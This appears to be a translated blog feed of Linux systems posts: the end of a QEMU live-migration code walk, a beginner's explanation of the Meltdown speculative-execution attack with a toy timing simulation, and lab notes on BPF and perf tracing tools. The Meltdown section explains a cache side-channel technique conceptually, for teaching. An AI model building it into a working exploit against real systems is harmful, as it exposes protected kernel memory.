<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int qemu_loadvm_state(QEMUFile *f)
{
xxx check version
ret = qemu_loadvm_state_main(f, mis);
xxx
cpu_synchronize_all_post_init();
return ret;
}
</code></pre></div></div>
<p>Clearly, qemu_loadvm_state_main is the main function that rebuilds the VM.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int qemu_loadvm_state_main(QEMUFile *f, MigrationIncomingState *mis)
{
uint8_t section_type;
int ret = 0;
while ((section_type = qemu_get_byte(f)) != QEMU_VM_EOF) {
ret = 0;
trace_qemu_loadvm_state_section(section_type);
switch (section_type) {
case QEMU_VM_SECTION_START:
case QEMU_VM_SECTION_FULL:
ret = qemu_loadvm_section_start_full(f, mis);
if (ret < 0) {
goto out;
}
break;
case QEMU_VM_SECTION_PART:
case QEMU_VM_SECTION_END:
ret = qemu_loadvm_section_part_end(f, mis);
if (ret < 0) {
goto out;
}
break;
case QEMU_VM_COMMAND:
ret = loadvm_process_command(f);
trace_qemu_loadvm_state_section_command(ret);
if ((ret < 0) || (ret & LOADVM_QUIT)) {
goto out;
}
break;
default:
error_report("Unknown savevm section type %d", section_type);
ret = -EINVAL;
goto out;
}
}
out:
if (ret < 0) {
qemu_file_set_error(f, ret);
}
return ret;
}
</code></pre></div></div>
<p>qemu_loadvm_state_main processes the individual sections in a loop; src puts markers such as QEMU_VM_SECTION_START into the stream.</p>
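<p>This loop is a classic tag-framed stream parser: read a section-type byte, dispatch on it, repeat until the EOF marker. A minimal Python model of the same pattern (the tag values and the one-byte length framing here are illustrative, not QEMU's real wire format):</p>

```python
QEMU_VM_SECTION_START, QEMU_VM_SECTION_PART, QEMU_VM_EOF = 0x01, 0x02, 0x00

def load_state(stream):
    """Consume (tag, payload_len, payload) records until the EOF tag."""
    sections = []
    i = 0
    while True:
        tag = stream[i]; i += 1
        if tag == QEMU_VM_EOF:
            break
        length = stream[i]; i += 1                     # toy 1-byte length field
        payload = bytes(stream[i:i + length]); i += length
        sections.append((tag, payload))
    return sections

stream = bytes([QEMU_VM_SECTION_START, 3, 65, 66, 67,  # section "ABC"
                QEMU_VM_SECTION_PART, 1, 68,           # section "D"
                QEMU_VM_EOF])
print(load_state(stream))   # [(1, b'ABC'), (2, b'D')]
```

<p>The real function additionally dispatches each tag to a type-specific loader (qemu_loadvm_section_start_full, loadvm_process_command, ...) rather than just collecting payloads.</p>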
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_loadvm_section_start_full
-->find_se
-->vmstate_load
-->ram_load
-->qemu_get_buffer
</code></pre></div></div>
<p>The last function copies the received data into the destination VM's memory.
This has been a brief look at live migration; later posts will dig into some specific issues.</p>
<h3>References</h3>
<p>Amit Shah: <a href="https://developers.redhat.com/blog/2015/03/24/live-migrating-qemu-kvm-virtual-machines/">Live Migrating QEMU-KVM Virtual Machines</a></p>
A beginner's understanding of the Meltdown vulnerability2018-01-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/01/04/metldown
<p>The goal of this post is to help beginners like me quickly understand the Meltdown vulnerability.</p>
<p>Straight to the picture:</p>
<p><img src="/assets/img/meltdown/1.png" alt="" /></p>
<p>The root cause of the vulnerability is the CPU's speculative execution. Instructions 1, 2, and 3 in the figure above appear to execute one after another, but in reality a modern CPU has long since started executing them in parallel, for efficiency of course.
For example, while executing instruction 1 it can also execute instructions 2 and 3. Because instruction 1 faults, the later instructions that depend on it, although already executed, are never committed to the registers; the CPU's work is thrown away and rax and rbx are not changed. This is the rollback after a CPU misprediction. The problem lies precisely in this rollback: on the surface, all the registers and architectural state are rolled back, but the TLB and caches are not.</p>
<p>Normally, instruction 1 accesses a kernel address directly from user mode, which of course is not allowed. But at the CPU level the permission check and the data read are separate, again for efficiency. After the CPU has read the data at the kernel address, i.e. 1a has executed, speculative execution also runs instructions 2 and 3 in parallel. If 2 and 3 finish before 1b has run, that is, before the exception flag is set, then instruction 3 pulls the data at address rbx+rax*4096 into the cache. In instruction 2 we shifted the value left by 0xc bits, which is equivalent to multiplying by 4096. We use rax*4096 to index an array, so the line at rbx+rax*4096 becomes cached. When the CPU then executes 1b, notices the permission violation, and rolls back, the cache is not cleared, so that data is still in the cache.</p>
<p>Now we can probe each location rbx + i*4096. Since exactly one of these addresses is cached, accessing that particular address takes far less time than the others, so we recover the value of the byte at the kernel address. This is the so-called cache side-channel attack.</p>
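<p>The timing-based recovery in this last step can be illustrated with a toy model that skips the speculation entirely and only simulates the cache state it leaves behind (the 40/300-cycle latencies are invented numbers):</p>

```python
def simulate_probe(secret_byte):
    # After the rolled-back speculation, exactly one probe-array slot
    # (index = the secret byte) is still resident in the cache.
    cached_slot = secret_byte

    def access_time(i):
        return 40 if i == cached_slot else 300   # made-up hit vs. miss latency

    # Attacker step: time an access to rbx + i*4096 for every i
    # and take the fastest slot as the recovered byte value.
    return min(range(256), key=access_time)

print(simulate_probe(0x42))   # 66 (0x42): the secret byte, recovered from timing
```

<p>A real exploit measures the latencies with rdtsc after flushing the probe array with clflush, but the decoding logic is exactly this: the fastest slot index is the leaked byte.</p>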
linux-tracing-workshop-part 32017-12-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/13/tracing3
<p>Notes from working through the <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a> labs; this third part covers three exercises.</p>
<ul>
<li><a href="#13">13. Using BPF Tools: trace and argdist One-Liners</a></li>
<li><a href="#14">14. Using BPF Tools: CPU and Off-CPU Investigation</a></li>
<li><a href="#15">15. Using perf Tools: Slow File I/O</a></li>
</ul>
<h2 id="13">13. Using BPF Tools: trace and argdist One-Liners</h2>
<h3>Showing all login attempts with trace</h3>
<p>Whenever someone logs into the system or runs su, set*uid is called, so trace can record every login and sudo operation on the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace '::sys_setuid "uid=%d", arg1'
PID TID COMM FUNC -
53999 53999 sshd sys_setuid uid=0
54050 54050 su sys_setuid uid=1000
54076 54076 cron sys_setuid uid=0
54103 54103 cron sys_setuid uid=0
</code></pre></div></div>
<h3>Finding hot files with argdist</h3>
<p>argdist shows the distribution of function arguments; tracing the arguments of __vfs_write and __vfs_read lets us identify hot files.
Start argdist in one terminal and a dd in another:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dd if=/dev/zero of=/dev/null bs=1K count=1M
</code></pre></div></div>
<p>Here is the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -T 5 -i 2 -C 'p::__vfs_write(struct file *f):char*:f->f_path.dentry->d_name.name#writes' -C 'p::__vfs_read(struct file *f):char*:f->f_path.dentry->d_name.name#reads'
[16:11:05]
writes
COUNT EVENT
1 f->f_path.dentry->d_name.name = kprobe_events
3 f->f_path.dentry->d_name.name = [eventfd]
3 f->f_path.dentry->d_name.name = 1
7 f->f_path.dentry->d_name.name = TCP
reads
COUNT EVENT
1 f->f_path.dentry->d_name.name = inotify
1 f->f_path.dentry->d_name.name = [timerfd]
3 f->f_path.dentry->d_name.name = [eventfd]
24 f->f_path.dentry->d_name.name = ptmx
[16:11:07]
writes
COUNT EVENT
9 f->f_path.dentry->d_name.name = 1
24 f->f_path.dentry->d_name.name = TCP
reads
COUNT EVENT
18 f->f_path.dentry->d_name.name = ptmx
[16:11:09]
writes
COUNT EVENT
1 f->f_path.dentry->d_name.name = TCP
1 f->f_path.dentry->d_name.name = 4
6 f->f_path.dentry->d_name.name = 1
15 f->f_path.dentry->d_name.name = TCP
505475 f->f_path.dentry->d_name.name = null
reads
COUNT EVENT
1 f->f_path.dentry->d_name.name = TCP
2 f->f_path.dentry->d_name.name = ld-2.23.so
3 f->f_path.dentry->d_name.name = dd
28 f->f_path.dentry->d_name.name = ptmx
505475 f->f_path.dentry->d_name.name = zero
</code></pre></div></div>
<h3>Showing PostgreSQL queries with trace</h3>
<p>This section uses trace directly on PostgreSQL's USDT probes.</p>
<p>Start postgres and connect to the database:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu1604:/usr/local/pgsql/bin$ ./psql -d postgres
postgres=# \c foo
You are now connected to database "foo" as user "test".
foo=# select * from tbl
</code></pre></div></div>
<p>After several attempts, the process handling the queries is found to be 54397.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ps aux | grep postgres
test 49781 0.0 0.8 172968 16660 pts/0 S Dec06 0:00 /usr/local/pgsql/bin/postgres -D /tmp/pgdata
test 49784 0.0 0.2 173112 4664 ? Ss Dec06 0:00 postgres: checkpointer
test 49785 0.0 0.2 172968 5000 ? Ss Dec06 0:00 postgres: background writer
test 49786 0.0 0.4 172968 8192 ? Ss Dec06 0:01 postgres: walwriter
test 49787 0.0 0.3 173624 6440 ? Ss Dec06 0:00 postgres: autovacuum launcher
test 49788 0.0 0.1 28052 2280 ? Ss Dec06 0:01 postgres: stats collector
test 49789 0.0 0.1 173396 3824 ? Ss Dec06 0:00 postgres: logical replication launcher
test 54372 0.0 0.2 34240 4100 pts/1 S+ 16:39 0:00 ./psql -d postgres
test 54397 0.0 0.5 173904 11152 ? Ss 16:41 0:00 postgres: test foo [local] idle
root 54400 0.0 0.0 15784 932 pts/4 S+ 16:42 0:00 grep --color=auto postgres
-
^Croot@ubuntu1604:/usr/share/bcc/tools# ./trace -p 54397 'u:/usr/local/pgsql/bin/postgres:query__start "%s", arg1'
PID TID COMM FUNC -
54397 54397 postgres query__start select * from tbl
</code></pre></div></div>
<h3>Showing PostgreSQL latency distribution with argdist</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
</code></pre></div></div>
<p>Copy <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/pg-slow.sql">pg-slow.sql</a> to /tmp, then run it from the pgsql prompt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> foo=# \i /tmp/pg-slow.sql
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -c -i 5 -H 'r:/usr/local/pgsql/bin/postgres:PortalRun():u64:$latency/1000000#latency (ms)'
[17:18:00]
latency (ms) : count distribution
0 -> 1 : 1 |****************************************|
[17:18:05]
latency (ms) : count distribution
0 -> 1 : 1 |******** |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 5 |****************************************|
256 -> 511 : 0 | |
512 -> 1023 : 0 | |
1024 -> 2047 : 0 | |
2048 -> 4095 : 0 | |
4096 -> 8191 : 1 |******** |
</code></pre></div></div>
<h2 id="14"> 14. Using BPF Tools: CPU and Off-CPU Investigation </h2>
<p>This lab investigates a program that appears CPU-bound but actually spends most of its time off-CPU.</p>
<p>Compile and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -fno-inline -pthread blocky.c -o blocky
root@ubuntu1604:~/linux-tracing-workshop# ./blocky
[*] Ready to process requests.
[*] Backend handler initialized.
[*] Request processor initialized.
[*] Request processor initialized.
[-] Handled 1000 requests.
[-] Handled 2000 requests.
</code></pre></div></div>
<p>It looks like requests are being handled at a steady rate.</p>
<p>But top shows that blocky's CPU utilization is very low, meaning much of the time it is not using the CPU at all.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./profile -F 997 -f -p $(pidof blocky) > folded-stacks
root@ubuntu1604:/usr/share/bcc/tools# ~/FlameGraph/flamegraph.pl folded-stacks > profile.svg
</code></pre></div></div>
<p>Generate a flame graph. It shows that request_processor and do_work consume a fair amount of CPU, and also that the program frequently ends up waiting on a lock.</p>
<p><img src="/assets/img/tracing3/1.png" alt="" /></p>
<p>Next, use cpudist to see how much time is spent on-CPU versus off-CPU:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -p $(pidof blocky)
[sudo] password for test:
Tracing on-CPU time... Hit Ctrl-C to end.
^C
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 3 |*************** |
4 -> 7 : 3 |*************** |
8 -> 15 : 2 |********** |
16 -> 31 : 5 |************************* |
32 -> 63 : 3 |*************** |
64 -> 127 : 5 |************************* |
128 -> 255 : 1 |***** |
256 -> 511 : 2 |********** |
512 -> 1023 : 1 |***** |
1024 -> 2047 : 0 | |
2048 -> 4095 : 3 |*************** |
4096 -> 8191 : 8 |****************************************|
8192 -> 16383 : 2 |********** |
</code></pre></div></div>
<p>The distribution above is bimodal: there are two compute clusters, one short and one long. The short one deserves attention, because it suggests the program keeps getting switched out. Now look at the off-CPU numbers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./cpudist -O -p $(pidof blocky)
Tracing off-CPU time... Hit Ctrl-C to end.
^C
usecs : count distribution
0 -> 1 : 2 | |
2 -> 3 : 1 | |
4 -> 7 : 4 | |
8 -> 15 : 7 | |
16 -> 31 : 7 | |
32 -> 63 : 3 | |
64 -> 127 : 48 |*** |
128 -> 255 : 93 |****** |
256 -> 511 : 28 |* |
512 -> 1023 : 11 | |
1024 -> 2047 : 10 | |
2048 -> 4095 : 6 | |
4096 -> 8191 : 6 | |
8192 -> 16383 : 580 |****************************************|
16384 -> 32767 : 556 |************************************** |
</code></pre></div></div>
<p>This is also a bimodal distribution, showing the time the program spends waiting. But where does the sleeping come from? offcputime answers that:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:/usr/share/bcc/tools$ sudo ./offcputime -f -p $(pidof blocky) > ~/folded-stacks
[sudo] password for test:
^Ctest@ubuntu:/usr/share/bcc/tools$ ls ~
...
test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > offcpu.svg
bash: offcpu.svg: Permission denied
test@ubuntu:/usr/share/bcc/tools$ ~/FlameGraph/flamegraph.pl ~/folded-stacks > ~/offcpu.svg
test@ubuntu:/usr/share/bcc/tools$
</code></pre></div></div>
<p>The flame graph shows that there are indeed two waiting paths: backend_handler calling nanosleep, and request_processor calling __lll_lock_wait:</p>
<p><img src="/assets/img/tracing3/2.png" alt="" /></p>
<h2 id="15"> 15. Using perf Tools: Slow File I/O </h2>
<p>This lab is like the previous one, but this time we use perf and a flame graph to show the file-write paths.</p>
<p>Compile and run the logger:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
root@ubuntu1604:~/linux-tracing-workshop# ./logger
</code></pre></div></div>
<p>iolatency shows that most I/O completes quickly, but there are also some slow I/Os:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools# ./iolatency
Tracing block I/O. Output every 1 seconds. Ctrl-C to end.
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 92 |############################### |
1 -> 2 : 114 |######################################|
2 -> 4 : 3 |# |
4 -> 8 : 3 |# |
8 -> 16 : 8 |### |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 103 |################################## |
1 -> 2 : 117 |######################################|
2 -> 4 : 4 |## |
4 -> 8 : 1 |# |
8 -> 16 : 4 |## |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 96 |################################## |
1 -> 2 : 108 |######################################|
2 -> 4 : 6 |### |
4 -> 8 : 1 |# |
8 -> 16 : 4 |## |
16 -> 32 : 4 |## |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 87 |################################ |
1 -> 2 : 106 |######################################|
2 -> 4 : 3 |## |
4 -> 8 : 4 |## |
8 -> 16 : 6 |### |
16 -> 32 : 2 |# |
>=(ms) .. <(ms) : I/O |Distribution |
0 -> 1 : 102 |######################################|
1 -> 2 : 103 |######################################|
2 -> 4 : 7 |### |
4 -> 8 : 1 |# |
8 -> 16 : 5 |## |
</code></pre></div></div>
<p>bitesize shows that most I/Os are small, but some are large:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# ./bitesize
Tracing block I/O size (bytes), until Ctrl-C...
^C
Kbytes : I/O Distribution
-> 0.9 : 2722 |######################################|
1.0 -> 7.9 : 2601 |##################################### |
8.0 -> 63.9 : 1342 |################### |
64.0 -> 127.9 : 0 | |
128.0 -> : 145 |### |
</code></pre></div></div>
<p>To find where the I/O comes from, we record stack traces at the block:block_rq_insert tracepoint:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# perf record -p $(pidof logger) -e block:block_rq_insert -g -- sleep 10
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.137 MB perf.data (450 samples) ]
</code></pre></div></div>
<p>Generate the flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/disk# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > io-stacks.svg
</code></pre></div></div>
<p><img src="/assets/img/tracing3/3.png" alt="" /></p>
<p>The flame graph shows the I/O comes from two threads: the one on the left runs more often and should be issuing the small I/Os; the one on the right runs less and corresponds to the large I/Os.</p>
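<p>The folded-stacks files fed to flamegraph.pl throughout these labs are plain text, one "frame1;frame2;... count" line per unique stack. A sketch of the collapsing step that stackcollapse-perf.pl and the BCC -f option perform (the sample stacks are made up):</p>

```python
from collections import Counter

def fold(stack_samples):
    """Collapse raw stack samples into flamegraph.pl's folded format:
    one 'frame1;frame2;... count' line per unique stack."""
    counts = Counter(";".join(frames) for frames in stack_samples)
    return [f"{stack} {n}" for stack, n in sorted(counts.items())]

samples = [
    ["main", "request_processor", "do_work"],
    ["main", "request_processor", "do_work"],
    ["main", "backend_handler", "nanosleep"],
]
for line in fold(samples):
    print(line)
# main;backend_handler;nanosleep 1
# main;request_processor;do_work 2
```

<p>flamegraph.pl then simply turns these counted prefix trees into the SVG rectangles, with width proportional to the count.</p>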
linux-tracing-workshop-part 22017-12-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/07/tracing2
<p>Notes from working through the <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a> labs; this second part covers three exercises.</p>
<ul>
<li><a href="#8">8. Writing BPF Tools: setuidsnoop</a></li>
<li><a href="#9">9. Writing BPF Tools: dbslower</a></li>
<li><a href="#10">10. Writing BPF Tools: Contention Stats and Stacks</a></li>
</ul>
<h2 id="8">8. Writing BPF Tools: setuidsnoop</h2>
<p>This section writes a BPF tool to trace the setuid system call.
We can already follow setuid with trace:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./trace.py 'sys_setuid "uid=0x%x", arg1' 'r::sys_setuid "rc=%d", retval'
PID TID COMM FUNC -
34913 34913 su sys_setuid uid=0x3e8
34913 34913 su sys_setuid rc=0
34932 34932 cron sys_setuid uid=0x0
34932 34932 cron sys_setuid rc=0
</code></pre></div></div>
<p>We can also write a standalone BPF tool; this section adapts killsnoop.py to trace setuid.</p>
<p>Step 1: replace sys_kill with sys_setuid</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kprobe__sys_kill->kprobe__sys_setuid
kretprobe__sys_kill->kretprobe__sys_setuid
</code></pre></div></div>
<p>Step 2: change the function signature</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kprobe__sys_setuid(struct pt_regs *ctx, int tpid, int sig)-->
int kprobe__sys_setuid(struct pt_regs *ctx, u32 uid)
</code></pre></div></div>
<p>Step 3: change the data structures, replacing kill's arguments with setuid's</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct val_t {
u64 pid;
u32 uid;
char comm[TASK_COMM_LEN];
};
struct data_t {
u64 pid;
u32 uid;
int ret;
char comm[TASK_COMM_LEN];
};
class Data(ct.Structure):
_fields_ = [
("pid", ct.c_ulonglong),
("uid", ct.c_uint),
("ret", ct.c_int),
("comm", ct.c_char * TASK_COMM_LEN)
]
</code></pre></div></div>
<p>Step 4: update the corresponding data in the kprobe and kretprobe</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kprobe__sys_kill(struct pt_regs *ctx, u32 uid)
{
u32 pid = bpf_get_current_pid_tgid();
FILTER
struct val_t val = {.pid = pid};
if (bpf_get_current_comm(&val.comm, sizeof(val.comm)) == 0) {
val.uid = uid;
infotmp.update(&pid, &val);
}
return 0;
};
int kretprobe__sys_kill(struct pt_regs *ctx)
{
struct data_t data = {};
struct val_t *valp;
u32 pid = bpf_get_current_pid_tgid();
valp = infotmp.lookup(&pid);
if (valp == 0) {
// missed entry
return 0;
}
bpf_probe_read(&data.comm, sizeof(data.comm), valp->comm);
data.pid = pid;
data.uid = valp->uid;
data.ret = PT_REGS_RC(ctx);
events.perf_submit(ctx, &data, sizeof(data));
infotmp.delete(&pid);
return 0;
}
</code></pre></div></div>
<p>Step 5: update the printed fields</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> print("%-9s %-6s %-16s %-6s %s" % (
"TIME", "PID", "COMM", "UID", "RESULT"))
# process event
def print_event(cpu, data, size):
event = ct.cast(data, ct.POINTER(Data)).contents
if (args.failed and (event.ret >= 0)):
return
print("%-9s %-6d %-16s %-6d %d" % (strftime("%H:%M:%S"),
event.pid, event.comm.decode(), event.uid, event.ret))
</code></pre></div></div>
<p>Result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./setuidsnoop.py
TIME PID COMM UID RESULT
11:41:05 36919 su 1000 0
11:45:01 36941 cron 0 0
</code></pre></div></div>
<p>The original lab's <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/setuidsnoop.py">complete version</a></p>
<h2 id="9">9. Writing BPF Tools: dbslower </h2>
<p>This lab develops a USDT-probe-based BCC tool to monitor database query latency and execution.</p>
<p>First download PostgreSQL, build it with --enable-dtrace so that it supports USDT, and run it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ cd /usr/local/pgsql/bin
$ ./initdb -D /tmp/pgdata
$ ./pg_ctl -D /tmp/pgdata start
</code></pre></div></div>
<p>List the USDT probe points:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu1604:/usr/local/pgsql/bin$ /usr/share/bcc/tools/tplist -p $(pgrep -n postgres) | grep query
/usr/local/pgsql/bin/postgres postgresql:query__parse__start
/usr/local/pgsql/bin/postgres postgresql:query__parse__done
/usr/local/pgsql/bin/postgres postgresql:query__rewrite__start
/usr/local/pgsql/bin/postgres postgresql:query__rewrite__done
/usr/local/pgsql/bin/postgres postgresql:query__plan__start
/usr/local/pgsql/bin/postgres postgresql:query__plan__done
/usr/local/pgsql/bin/postgres postgresql:query__start
/usr/local/pgsql/bin/postgres postgresql:query__done
/usr/local/pgsql/bin/postgres postgresql:query__execute__start
/usr/local/pgsql/bin/postgres postgresql:query__execute__done
</code></pre></div></div>
<p>This lab focuses on query__start and query__done; query__start's first argument is the query text.</p>
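<p>The pairing the tool performs — stash a timestamp keyed by pid on query__start, look it up and subtract on query__done — can be shown in plain Python (the event stream and timestamps here are invented):</p>

```python
def latencies(events):
    """events: (kind, pid, ts_ns[, query]) tuples; returns (pid, query, delta_ns)."""
    start = {}                       # pid -> (ts, query), like the BPF_HASH 'temp'
    out = []
    for ev in events:
        if ev[0] == "query__start":
            _, pid, ts, query = ev
            start[pid] = (ts, query)
        elif ev[0] == "query__done":
            _, pid, ts = ev
            if pid in start:         # ignore a done with no matching start
                t0, query = start.pop(pid)
                out.append((pid, query, ts - t0))
    return out

evs = [("query__start", 50216, 1_000_000, "select * from tbl"),
       ("query__done", 50216, 3_500_000)]
print(latencies(evs))   # [(50216, 'select * from tbl', 2500000)]
```

<p>The BPF version below does the same thing in kernel context, with bpf_ktime_get_ns for timestamps and a perf buffer instead of a return list.</p>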
<p>Now fill in the tool following the overall skeleton the lab provides.</p>
<p>Step 1: find PostgreSQL's process ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dbpid = int(subprocess.check_output("pgrep -n postgres".split()))
</code></pre></div></div>
<p>Step 2: define the data structures, containing the PID, timestamp, duration, and query text</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct temp_t {
u64 timestamp;
char *query;
};
struct data_t {
u64 pid;
u64 timestamp;
u64 duration;
char query[256];
};
BPF_HASH(temp, u64, struct temp_t);
BPF_PERF_OUTPUT(events);
</code></pre></div></div>
<p>Step 3: write the two functions that handle query__start and query__end</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int probe_query_start(struct pt_regs *ctx) {
struct temp_t tmp = {};
tmp.timestamp = bpf_ktime_get_ns();
bpf_usdt_readarg(1, ctx, &tmp.query);
u64 pid = bpf_get_current_pid_tgid();
temp.update(&pid, &tmp);
return 0;
}
int probe_query_end(struct pt_regs *ctx) {
struct temp_t *tempp;
u64 pid = bpf_get_current_pid_tgid();
tempp = temp.lookup(&pid);
if (!tempp)
return 0;
u64 delta = bpf_ktime_get_ns() - tempp->timestamp;
if (delta >=""" + str(threshold_ns) + """) {
struct data_t data = {};
data.pid = pid >> 32;
data.timestamp = tempp->timestamp;
data.duration = delta;
bpf_probe_read(&data.query, sizeof(data.query), tempp->query);
events.perf_submit(ctx, &data, sizeof(data));
}
temp.delete(&pid);
return 0;
};
</code></pre></div></div>
<p>Step 4: use enable_probe to enable query__start and query__done</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> usdt = USDT(pid=int(dbpid))
usdt.enable_probe("query__start", "probe_query_start")
usdt.enable_probe("query__done", "probe_query_end")
</code></pre></div></div>
<p>Step 5: define a Python data structure to represent the output</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> class Data(ct.Structure):
_fields_ = [
("pid", ct.c_ulonglong),
("timestamp", ct.c_ulonglong),
("delta", ct.c_ulonglong),
("query", ct.c_char * 256)
]
</code></pre></div></div>
<p>Step 6: print the output</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> start = 0
def print_event(cpu, data, size):
global start
event = ct.cast(data, ct.POINTER(Data)).contents
if start == 0:
start = event.timestamp
print("%-14.6f %-6d %8.3f %s" % (float(event.timestamp - start) / 1000000000,
event.pid, float(event.delta) / 1000000, event.query))
print("Tracing database queries for PID %d slower than %d ms..." %
(dbpid, args.threshold))
print("%-14s %-6s %8s %s" % ("TIME(s)", "PID", "MS", "QUERY"))
bpf["events"].open_perf_buffer(print_event)
</code></pre></div></div>
<p>Result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./lqdbslower.py postgres 0
/virtual/main.c:45:15: warning: comparison of unsigned expression >= 0 is always true [-Wtautological-compare]
if (delta >=0) {
~~~~~ ^ ~
1 warning generated.
Tracing database queries for PID 50216 slower than 0 ms...
TIME(s) PID MS QUERY
0.000000 50216 1.806 INSERT INTO tbl(name, date) VALUES('aaa', '2013-12-22');
7.150496 50216 0.227 select * from tbl
</code></pre></div></div>
<p>The original lab's <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/dbslower.py">dbslower.py</a></p>
<h2 id="10"> 10. Writing BPF Tools: Contention Stats and Stacks </h2>
<p>This lab writes a BCC-based tool that observes lock contention on Linux.</p>
<p>First compile and run the program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -pthread parprimes.c -o parprimes
root@ubuntu1604:~/linux-tracing-workshop# ./parprimes 4 10000
</code></pre></div></div>
<p>Search for the TODOs in <a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/lockstat.py">lockstat.py</a> and complete the tool.</p>
<p>// TODO Update tm_key fields with the mutex, tid, and stack id</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> tm_key.tid = pid;
tm_key.mtx = entry->mtx;
tm_key.lock_stack_id = stack_id;
</code></pre></div></div>
<p>// TODO Call locks.lookup_or_init(…) and update the wait time and the enter count
// of the entry in the locks data structure</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct thread_mutex_val_t *existing_tm_val, new_tm_val = {};
existing_tm_val = locks.lookup_or_init(&tm_key, &new_tm_val);
existing_tm_val->wait_time_ns += wait_time;
if (PT_REGS_RC(ctx) == 0) {
existing_tm_val->enter_count += 1;
}
</code></pre></div></div>
